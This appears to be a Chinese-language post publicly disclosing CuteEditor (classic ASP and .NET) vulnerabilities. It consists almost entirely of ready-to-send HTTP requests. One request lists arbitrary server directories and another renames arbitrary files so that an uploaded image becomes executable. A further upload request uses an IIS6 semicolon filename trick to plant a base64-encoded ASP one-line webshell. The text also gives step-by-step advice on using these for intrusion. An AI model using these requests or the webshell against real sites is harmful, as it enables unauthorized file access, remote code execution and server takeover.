无意间发现的CuteEditor for classic asp漏洞,编辑器用量不多,干脆直接公布算了
列任意目录以及文件:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MXwxfDF8MXwxfC98L3wvfC98L3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC50eHQsLmRvYywuZG9jeCwucGRmLC5hdmksLm1wZywubXBlZywubXAzLC53YXYsLnN3ZiwuanBnLC5qcGVnLC5naWYsLnBuZywuaHRtLC54bHMsLmh0bWwsLnJ0Ziwud212LC5hc3AsLmFzYSwuYXNweCwuYXNjeCwuYXNheCwucmFyLC56aXAsLmFzaHgsLmFzbXgsLjd6LC50YXIsLmRsbCwuZXhlLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3d&MP=/&Theme=Office2003 HTTP/1.1 Host: 192.168.223.250:8889 Cookie: CESecurity=MXwxfDF8MXwxfC98L3wvfC98L3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC50eHQsLmRvYywuZG9jeCwucGRmLC5hdmksLm1wZywubXBlZywubXAzLC53YXYsLnN3ZiwuanBnLC5qcGVnLC5naWYsLnBuZywuaHRtLC54bHMsLmh0bWwsLnJ0Ziwud212LC5hc3AsLmFzYSwuYXNweCwuYXNjeCwuYXNheCwucmFyLC56aXAsLmFzaHgsLmFzbXgsLjd6LC50YXIsLmRsbCwuZXhlLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3d;
将querystring中setting参数base64解码后,可以添加其他要列出文件的拓展名,cookie中CESecurity参数需要与其保持一致,同时需要删除所有以的ASPSESSIONID开始的Cookie,以防止Session校验失败。
任意文件改名:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U=&MP=/uploads/&Theme=Office2003&loc=&action=renamefile&filename=/1.aspx&newname=/1.aspx.txt HTTP/1.1 Host: 192.168.223.250:8889 Cookie: CESecurity=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3D; ASPSESSIONIDASSRTAQC=MBLPJBJAGFPDNAAJNFENOELH
利用:
1.上传个jpg然后改名 2.上传目录没执行权限或其他情况下,列目录查找备份文件等信息,或改名下载其他脚本分析
cuteeditor for .net在iis6下的漏洞,做个备份:
POST /CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp; HTTP/1.1 Host: XXXXXX Content-Length: 28 PCVldmFsIHJlcXVlc3QoImEiKSU+
提交内容为base64编码后的一句话,_AddonGuid不能与服务器上已有文件重复,文件保存在~/UploaderTemp/uploading.GUID.上传文件名.resx
